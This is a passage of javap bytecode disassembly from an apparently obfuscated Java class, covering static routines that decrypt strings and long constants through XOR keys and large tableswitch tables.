                       5: 273
                 default: 278
            }
       248: bipush        75
       250: goto          280
       253: bipush        33
       255: goto          280
       258: bipush        103
       260: goto          280
       263: bipush        66
       265: goto          280
       268: bipush        76
       270: goto          280
       273: bipush        118
       275: goto          280
       278: bipush        12
       280: ixor
       281: i2c
       282: castore
       283: iinc          14, 1
       286: swap
       287: dup_x1
       288: ifne          296
       291: dup2
       292: swap
       293: goto          203
       296: swap
       297: dup_x1
       298: iload         14
       300: if_icmpgt     200
       303: new           #325                // class java/lang/String
       306: dup_x1
       307: swap
       308: invokespecial #102                // Method java/lang/String."<init>":([C)V
       311: invokevirtual #78                 // Method java/lang/String.intern:()Ljava/lang/String;
       314: swap
       315: pop
       316: swap
       317: tableswitch   { // 0 to 0
                       0: 120
                 default: 50
            }
       336: iconst_3
       337: newarray       long
       339: astore        4
       341: iconst_0
       342: istore_1
       343: ldc           #16                 // String C\u0085\reÖÜª\u0012\r\u0093Q\u001a\u009c\u0097y±jµ:\u0094\u00047Ê\u009d
       345: dup
       346: astore_2
       347: invokevirtual #247                // Method java/lang/String.length:()I
       350: istore_3
       351: iconst_0
       352: istore_0
       353: aload_2
       354: iload_0
       355: iinc          0, 8
       358: iload_0
       359: invokevirtual #339                // Method java/lang/String.substring:(II)Ljava/lang/String;
       362: ldc           #1                  // String ISO-8859-1
       364: invokevirtual #233                // Method java/lang/String.getBytes:(Ljava/lang/String;)[B
       367: astore        5
       369: aload         4
       371: iload_1
       372: iinc          1, 1
       375: aload         5
       377: iconst_0
       378: baload
       379: i2l
       380: ldc2_w        #375                // long 255l
       383: land
       384: bipush        56
       386: lshl
       387: aload         5
       389: iconst_1
       390: baload
       391: i2l
       392: ldc2_w        #375                // long 255l
       395: land
       396: bipush        48
       398: lshl
       399: lor
       400: aload         5
       402: iconst_2
       403: baload
       404: i2l
       405: ldc2_w        #375                // long 255l
       408: land
       409: bipush        40
       411: lshl
       412: lor
       413: aload         5
       415: iconst_3
       416: baload
       417: i2l
       418: ldc2_w        #375                // long 255l
       421: land
       422: bipush        32
       424: lshl
       425: lor
       426: aload         5
       428: iconst_4
       429: baload
       430: i2l
       431: ldc2_w        #375                // long 255l
       434: land
       435: bipush        24
       437: lshl
       438: lor
       439: aload         5
       441: iconst_5
       442: baload
       443: i2l
       444: ldc2_w        #375                // long 255l
       447: land
       448: bipush        16
       450: lshl
       451: lor
       452: aload         5
       454: bipush        6
       456: baload
       457: i2l
       458: ldc2_w        #375                // long 255l
       461: land
       462: bipush        8
       464: lshl
       465: lor
       466: aload         5
       468: bipush        7
       470: baload
       471: i2l
       472: ldc2_w        #375                // long 255l
       475: land
       476: lor
       477: iconst_m1
       478: goto          502
       481: lastore
       482: iload_0
       483: iload_3
       484: if_icmplt     353
       487: aload         4
       489: putstatic     #43                 // Field c:[J
       492: iconst_3
       493: anewarray     #94                 // class java/lang/Long
       496: putstatic     #296                // Field d:[Ljava/lang/Long;
       499: goto          513
       502: dup_x2
       503: pop
       504: lload         6
       506: lxor
       507: dup2_x1
       508: pop2
       509: pop
       510: goto          481
       513: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        3301
         6: ixor
         7: ldc           #5                  // int 65535
         9: iand
        10: istore_3
        11: getstatic     #110                // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #283                // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #255                // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1078
                       2: 1084
                       3: 1089
                       4: 1095
                       5: 1101
                       6: 1106
                       7: 1112
                       8: 1118
                       9: 1124
                      10: 1129
                      11: 1134
                      12: 1139
                      13: 1143
                      14: 1149
                      15: 1154
                      16: 1160
                      17: 1166
                      18: 1171
                      19: 1177
                      20: 1183
                      21: 1188
                      22: 1193
                      23: 1199
                      24: 1205
                      25: 1210
                      26: 1216
                      27: 1222
                      28: 1228
                      29: 1233
                      30: 1239
                      31: 1244
                      32: 1250
                      33: 1255
                      34: 1261
                      35: 1266
                      36: 1272
                      37: 1278
                      38: 1283
                      39: 1288
                      40: 1294
                      41: 1300
                      42: 1305
                      43: 1311
                      44: 1317
                      45: 1322
                      46: 1328
                      47: 1333
                      48: 1338
                      49: 1343
                      50: 1348
                      51: 1354
                      52: 1360
                      53: 1366
                      54: 1371
                      55: 1376
                      56: 1382
                      57: 1387
                      58: 1392
                      59: 1398
                      60: 1404
                      61: 1410
                      62: 1415
                      63: 1421
                      64: 1426
                      65: 1431
                      66: 1437
                      67: 1442
                      68: 1447
                      69: 1453
                      70: 1458
                      71: 1464
                      72: 1470
                      73: 1476
                      74: 1481
                      75: 1487
                      76: 1492
                      77: 1497
                      78: 1503
                      79: 1507
                      80: 1512
                      81: 1517
                      82: 1522
                      83: 1528
                      84: 1534
                      85: 1539
                      86: 1544
                      87: 1550
                      88: 1556
                      89: 1561
                      90: 1567
                      91: 1573
                      92: 1579
                      93: 1585
                      94: 1590
                      95: 1596
                      96: 1602
                      97: 1608
                      98: 1614
                      99: 1619
                     100: 1624
                     101: 1629
                     102: 1634
                     103: 1640
                     104: 1646
                     105: 1652
                     106: 1657
                     107: 1662
                     108: 1667
                     109: 1672
                     110: 1677
                     111: 1682
                     112: 1688
                     113: 1693
                     114: 1699
                     115: 1704
                     116: 1710
                     117: 1716
                     118: 1722
                     119: 1728
                     120: 1734
                     121: 1740
                     122: 1746
                     123: 1752
                     124: 1758
                     125: 1764
                     126: 1769
                     127: 1775
                     128: 1780
                     129: 1785
                     130: 1790
                     131: 1795
                     132: 1801
                     133: 1806
                     134: 1812
                     135: 1817
                     136: 1822
                     137: 1828
                     138: 1834
                     139: 1839
                     140: 1845
                     141: 1850
                     142: 1856
                     143: 1862
                     144: 1867
                     145: 1873
                     146: 1878
                     147: 1883
                     148: 1887
                     149: 1893
                     150: 1898
                     151: 1903
                     152: 1909
                     153: 1915
                     154: 1920
                     155: 1925
                     156: 1931
                     157: 1937
                     158: 1942
                     159: 1947
                     160: 1952
                     161: 1957
                     162: 1963
                     163: 1969
                     164: 1974
                     165: 1980
                     166: 1986
                     167: 1990
                     168: 1996
                     169: 2002
                     170: 2008
                     171: 2013
                     172: 2019
                     173: 2024
                     174: 2029
                     175: 2035
                     176: 2041
                     177: 2047
                     178: 2053
                     179: 2058
                     180: 2064
                     181: 2069
                     182: 2075
                     183: 2080
                     184: 2086
                     185: 2091
                     186: 2097
                     187: 2103
                     188: 2109
                     189: 2114
                     190: 2119
                     191: 2125
                     192: 2130
                     193: 2135
                     194: 2139
                     195: 2145
                     196: 2150
                     197: 2156
                     198: 2162
                     199: 2167
                     200: 2172
                     201: 2178
                     202: 2184
                     203: 2189
                     204: 2195
                     205: 2200
                     206: 2206
                     207: 2211
                     208: 2216
                     209: 2221
                     210: 2227
                     211: 2232
                     212: 2237
                     213: 2242
                     214: 2248
                     215: 2254
                     216: 2260
                     217: 2266
                     218: 2272
                     219: 2278
                     220: 2284
                     221: 2290
                     222: 2295
                     223: 2300
                     224: 2306
                     225: 2311
                     226: 2317
                     227: 2322
                     228: 2327
                     229: 2333
                     230: 2338
                     231: 2343
                     232: 2347
                     233: 2352
                     234: 2357
                     235: 2363
                     236: 2368
                     237: 2373
                     238: 2379
                     239: 2385
                     240: 2390
                     241: 2395
                     242: 2400
                     243: 2406
                     244: 2411
                     245: 2416
                     246: 2422
                     247: 2427
                     248: 2432
                     249: 2437
                     250: 2443
                     251: 2448
                     252: 2453
                     253: 2458
                     254: 2463
                 default: 2469
            }
      1072: sipush        180
      1075: goto          2471
      1078: sipush        216
      1081: goto          2471
      1084: bipush        80
      1086: goto          2471
      1089: sipush        165
      1092: goto          2471
      1095: sipush        248
      1098: goto          2471
      1101: bipush        42
      1103: goto          2471
      1106: sipush        134
      1109: goto          2471
      1112: sipush        225
      1115: goto          2471
      1118: sipush        230
      1121: goto          2471
      1124: bipush        81
      1126: goto          2471
      1129: bipush        53
      1131: goto          2471
      1134: bipush        62
      1136: goto          2471
      1139: iconst_1
      1140: goto          2471
      1143: sipush        162
      1146: goto          2471
      1149: bipush        123
      1151: goto          2471
      1154: sipush        222
      1157: goto          2471
      1160: sipush        143
      1163: goto          2471
      1166: bipush        86
      1168: goto          2471
      1171: sipush        224
      1174: goto          2471
      1177: sipush        234
      1180: goto          2471
      1183: bipush        108
      1185: goto          2471
      1188: bipush        68
      1190: goto          2471
      1193: sipush        251
      1196: goto          2471
      1199: sipush        150
      1202: goto          2471
      1205: bipush        47
      1207: goto          2471
      1210: sipush        185
      1213: goto          2471
      1216: sipush        221
      1219: goto          2471
      1222: sipush        167
      1225: goto          2471
      1228: bipush        120
      1230: goto          2471
      1233: sipush        227
      1236: goto          2471
      1239: bipush        15
      1241: goto          2471
      1244: sipush        184
      1247: goto          2471
      1250: bipush        18
      1252: goto          2471
      1255: sipush        148
      1258: goto          2471
      1261: bipush        122
      1263: goto          2471
      1266: sipush        172
      1269: goto          2471
      1272: sipush        202
      1275: goto          2471
      1278: bipush        45
      1280: goto          2471
      1283: bipush        26
      1285: goto          2471
      1288: sipush        211
      1291: goto          2471
      1294: sipush        210
      1297: goto          2471
      1300: bipush        17
      1302: goto          2471
      1305: sipush        250
      1308: goto          2471
      1311: sipush        215
      1314: goto          2471
      1317: bipush        10
      1319: goto          2471
      1322: sipush        212
      1325: goto          2471
      1328: bipush        112
      1330: goto          2471
      1333: bipush        43
      1335: goto          2471
      1338: bipush        51
      1340: goto          2471
      1343: bipush        55
      1345: goto          2471
      1348: sipush        133
      1351: goto          2471
      1354: sipush        240
      1357: goto          2471
      1360: sipush        182
      1363: goto          2471
      1366: bipush        91
      1368: goto          2471
      1371: bipush        71
      1373: goto          2471
      1376: sipush        217
      1379: goto          2471
      1382: bipush        7
      1384: goto          2471
      1387: bipush        110
      1389: goto          2471
      1392: sipush        166
      1395: goto          2471
      1398: sipush        131
      1401: goto          2471
      1404: sipush        176
      1407: goto          2471
      1410: bipush        57
      1412: goto          2471
      1415: sipush        153
      1418: goto          2471
      1421: bipush        20
      1423: goto          2471
      1426: bipush        74
      1428: goto          2471
      1431: sipush        226
      1434: goto          2471
      1437: bipush        94
      1439: goto          2471
      1442: bipush        92
      1444: goto          2471
      1447: sipush        136
      1450: goto          2471
      1453: bipush        25
      1455: goto          2471
      1458: sipush        223
      1461: goto          2471
      1464: sipush        243
      1467: goto          2471
      1470: sipush        237
      1473: goto          2471
      1476: bipush        102
      1478: goto          2471
      1481: sipush        177
      1484: goto          2471
      1487: bipush        101
      1489: goto          2471
      1492: bipush        28
      1494: goto          2471
      1497: sipush        181
      1500: goto          2471
      1503: iconst_5
      1504: goto          2471
      1507: bipush        6
      1509: goto          2471
      1512: bipush        39
      1514: goto          2471
      1517: bipush        44
      1519: goto          2471
      1522: sipush        183
      1525: goto          2471
      1528: sipush        179
      1531: goto          2471
      1534: bipush        58
      1536: goto          2471
      1539: bipush        126
      1541: goto          2471
      1544: sipush        161
      1547: goto          2471
      1550: sipush        242
      1553: goto          2471
      1556: bipush        50
      1558: goto          2471
      1561: sipush        254
      1564: goto          2471
      1567: sipush        171
      1570: goto          2471
      1573: sipush        191
      1576: goto          2471
      1579: sipush        244
      1582: goto          2471
      1585: bipush        78
      1587: goto          2471
      1590: sipush        255
      1593: goto          2471
      1596: sipush        128
      1599: goto          2471
      1602: sipush        249
      1605: goto          2471
      1608: sipush        169
      1611: goto          2471
      1614: bipush        48
      1616: goto          2471
      1619: bipush        32
      1621: goto          2471
      1624: bipush        89
      1626: goto          2471
      1629: bipush        9
      1631: goto          2471
      1634: sipush        135
      1637: goto          2471
      1640: sipush        228
      1643: goto          2471
      1646: sipush        198
      1649: goto          2471
      1652: bipush        125
      1654: goto          2471
      1657: bipush        117
      1659: goto          2471
      1662: bipush        96
      1664: goto          2471
      1667: bipush        11
      1669: goto          2471
      1672: bipush        33
      1674: goto          2471
      1677: bipush        113
      1679: goto          2471
      1682: sipush        236
      1685: goto          2471
      1688: bipush        31
      1690: goto          2471
      1693: sipush        220
      1696: goto          2471
      1699: bipush        24
      1701: goto          2471
      1704: sipush        156
      1707: goto          2471
      1710: sipush        207
      1713: goto          2471
      1716: sipush        192
      1719: goto          2471
      1722: sipush        174
      1725: goto          2471
      1728: sipush        239
      1731: goto          2471
      1734: sipush        168
      1737: goto          2471
      1740: sipush        151
      1743: goto          2471
      1746: sipush        132
      1749: goto          2471
      1752: sipush        245
      1755: goto          2471
      1758: sipush        209
      1761: goto          2471
      1764: bipush        19
      1766: goto          2471
      1769: sipush        158
      1772: goto          2471
      1775: bipush        40
      1777: goto          2471
      1780: bipush        54
      1782: goto          2471
      1785: bipush        72
      1787: goto          2471
      1790: bipush        60
      1792: goto          2471
      1795: sipush        154
      1798: goto          2471
      1801: bipush        111
      1803: goto          2471
      1806: sipush        189
      1809: goto          2471
      1812: bipush        35
      1814: goto          2471
      1817: bipush        23
      1819: goto          2471
      1822: sipush        205
      1825: goto          2471
      1828: sipush        201
      1831: goto          2471
      1834: bipush        36
      1836: goto          2471
      1839: sipush        152
      1842: goto          2471
      1845: bipush        67
      1847: goto          2471
      1850: sipush        129
      1853: goto          2471
      1856: sipush        147
      1859: goto          2471
      1862: bipush        66
      1864: goto          2471
      1867: sipush        208
      1870: goto          2471
      1873: bipush        109
      1875: goto          2471
      1878: bipush        103
      1880: goto          2471
      1883: iconst_3
      1884: goto          2471
      1887: sipush        145
      1890: goto          2471
      1893: bipush        13
      1895: goto          2471
      1898: bipush        49
      1900: goto          2471
      1903: sipush        206
      1906: goto          2471
      1909: sipush        253
      1912: goto          2471
      1915: bipush        95
      1917: goto          2471
      1920: bipush        106
      1922: goto          2471
      1925: sipush        219
      1928: goto          2471
      1931: sipush        140
      1934: goto          2471
      1937: bipush        64
      1939: goto          2471
      1942: bipush        82
      1944: goto          2471
      1947: bipush        121
      1949: goto          2471
      1952: bipush        8
      1954: goto          2471
      1957: sipush        187
      1960: goto          2471
      1963: sipush        199
      1966: goto          2471
      1969: bipush        12
      1971: goto          2471
      1974: sipush        141
      1977: goto          2471
      1980: sipush        252
      1983: goto          2471
      1986: iconst_2
      1987: goto          2471
      1990: sipush        186
      1993: goto          2471
      1996: sipush        142
      1999: goto          2471
      2002: sipush        163
      2005: goto          2471
      2008: bipush        105
      2010: goto          2471
      2013: sipush        164
      2016: goto          2471
      2019: bipush        124
      2021: goto          2471
      2024: bipush        88
      2026: goto          2471
      2029: sipush        170
      2032: goto          2471
      2035: sipush        146
      2038: goto          2471
      2041: sipush        144
      2044: goto          2471
      2047: sipush        246
      2050: goto          2471
      2053: bipush        104
      2055: goto          2471
      2058: sipush        196
      2061: goto          2471
      2064: bipush        27
      2066: goto          2471
      2069: sipush        139
      2072: goto          2471
      2075: bipush        52
      2077: goto          2471
      2080: sipush        159
      2083: goto          2471
      2086: bipush        70
      2088: goto          2471
      2091: sipush        190
      2094: goto          2471
      2097: sipush        195
      2100: goto          2471
      2103: sipush        193
      2106: goto          2471
      2109: bipush        79
      2111: goto          2471
      2114: bipush        16
      2116: goto          2471
      2119: sipush        232
      2122: goto          2471
      2125: bipush        63
      2127: goto          2471
      2130: bipush        38
      2132: goto          2471
      2135: iconst_4
      2136: goto          2471
      2139: sipush        204
      2142: goto          2471
      2145: bipush        77
      2147: goto          2471
      2150: sipush        238
      2153: goto          2471
      2156: sipush        130
      2159: goto          2471
      2162: bipush        107
      2164: goto          2471
      2167: bipush        100
      2169: goto          2471
      2172: sipush        203
      2175: goto          2471
      2178: sipush        173
      2181: goto          2471
      2184: bipush        46
      2186: goto          2471
      2189: sipush        197
      2192: goto          2471
      2195: bipush        75
      2197: goto          2471
      2200: sipush        235
      2203: goto          2471
      2206: bipush        116
      2208: goto          2471
      2211: bipush        115
      2213: goto          2471
      2216: bipush        56
      2218: goto          2471
      2221: sipush        138
      2224: goto          2471
      2227: bipush        84
      2229: goto          2471
      2232: bipush        34
      2234: goto          2471
      2237: bipush        118
      2239: goto          2471
      2242: sipush        200
      2245: goto          2471
      2248: sipush        137
      2251: goto          2471
      2254: sipush        149
      2257: goto          2471
      2260: sipush        175
      2263: goto          2471
      2266: sipush        229
      2269: goto          2471
      2272: sipush        188
      2275: goto          2471
      2278: sipush        160
      2281: goto          2471
      2284: sipush        247
      2287: goto          2471
      2290: bipush        61
      2292: goto          2471
      2295: bipush        87
      2297: goto          2471
      2300: sipush        233
      2303: goto          2471
      2306: bipush        98
      2308: goto          2471
      2311: sipush        214
      2314: goto          2471
      2317: bipush        37
      2319: goto          2471
      2322: bipush        93
      2324: goto          2471
      2327: sipush        194
      2330: goto          2471
      2333: bipush        90
      2335: goto          2471
      2338: bipush        127
      2340: goto          2471
      2343: iconst_0
      2344: goto          2471
      2347: bipush        73
      2349: goto          2471
      2352: bipush        97
      2354: goto          2471
      2357: sipush        157
      2360: goto          2471
      2363: bipush        14
      2365: goto          2471
      2368: bipush        29
      2370: goto          2471
      2373: sipush        241
      2376: goto          2471
      2379: sipush        218
      2382: goto          2471
      2385: bipush        22
      2387: goto          2471
      2390: bipush        41
      2392: goto          2471
      2395: bipush        76
      2397: goto          2471
      2400: sipush        231
      2403: goto          2471
      2406: bipush        59
      2408: goto          2471
      2411: bipush        30
      2413: goto          2471
      2416: sipush        155
      2419: goto          2471
      2422: bipush        65
      2424: goto          2471
      2427: bipush        114
      2429: goto          2471
      2432: bipush        119
      2434: goto          2471
      2437: sipush        213
      2440: goto          2471
      2443: bipush        83
      2445: goto          2471
      2448: bipush        85
      2450: goto          2471
      2453: bipush        21
      2455: goto          2471
      2458: bipush        69
      2460: goto          2471
      2463: sipush        178
      2466: goto          2471
      2469: bipush        99
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #5                  // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #110                // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #325                // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #102                // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #78                 // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #110                // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn

  private static long a(int, long);
    Code:
         0: iload_0
         1: lload_1
         2: l2i
         3: ixor
         4: sipush        19573
         7: ixor
         8: sipush        32767
        11: iand
        12: istore_3
        13: getstatic     #296                // Field d:[Ljava/lang/Long;
        16: iload_3
        17: aaload
        18: ifnonnull     36
        21: getstatic     #296                // Field d:[Ljava/lang/Long;
        24: iload_3
        25: getstatic     #43                 // Field c:[J
        28: iload_3
        29: laload
        30: lload_1
        31: lxor
        32: invokestatic  #227                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        35: aastore
        36: getstatic     #296                // Field d:[Ljava/lang/Long;
        39: iload_3
        40: aaload
        41: invokevirtual #318                // Method java/lang/Long.longValue:()J
        44: lreturn
}
